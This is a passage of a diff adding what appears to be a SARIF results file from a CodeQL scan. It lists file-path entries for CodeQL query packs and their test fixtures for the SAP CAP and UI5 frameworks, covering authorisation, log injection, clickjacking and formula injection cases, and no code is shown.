+ } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 19 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 20 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 21 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 22 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 23 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 24 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 25 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 26 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 27 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 28 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 29 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 30 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 31 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 32 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 33 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 34 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 35 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 36 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 37 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 38 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 39 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 40 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 41 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 42 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 43 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 44 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 45 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 46 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 47 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + 
"uriBaseId" : "%SRCROOT%", + "index" : 48 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 49 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 50 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 51 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 52 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 53 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 54 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 55 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", + "uriBaseId" : "%SRCROOT%", + "index" : 56 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 57 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 58 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 59 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 60 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 61 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 62 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 63 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 64 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 65 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 66 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + 
"index" : 67 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 68 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 69 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 70 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 71 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 72 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 73 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 74 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 75 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 76 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", + "uriBaseId" : 
"%SRCROOT%", + "index" : 77 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 78 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 79 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 80 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 81 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 82 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 83 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 84 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 85 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 86 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 
87 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 88 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 89 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 90 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 91 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 92 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 93 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 94 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 95 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 96 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 97 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 98 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 99 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 100 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 101 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 102 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 104 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 105 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 107 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 109 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 110 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 111 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 112 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 113 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 115 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 116 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 117 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 118 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/src/qlpack.yml", + 
"uriBaseId" : "%SRCROOT%", + "index" : 119 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 123 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", + "uriBaseId" : "%SRCROOT%", + "index" : 124 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", + "uriBaseId" : "%SRCROOT%", + "index" : 125 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 126 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 127 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 128 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 129 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 130 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 131 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", + "uriBaseId" : "%SRCROOT%", + 
"index" : 132 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 133 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 134 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 135 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 137 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 139 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 140 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 141 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 142 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 143 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 144 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 145 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 146 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 147 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 148 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 149 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 151 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 152 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 153 + } + 
}, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 155 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 156 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 157 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 158 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 160 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 161 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 162 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 164 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 165 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 167 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 168 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 169 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 170 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 173 + } + }, { + "location" : { + "uri" : 
